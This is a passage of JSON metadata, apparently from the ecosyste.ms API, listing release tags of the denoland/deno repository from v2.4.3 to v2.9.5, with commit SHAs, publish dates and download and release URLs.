noland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/man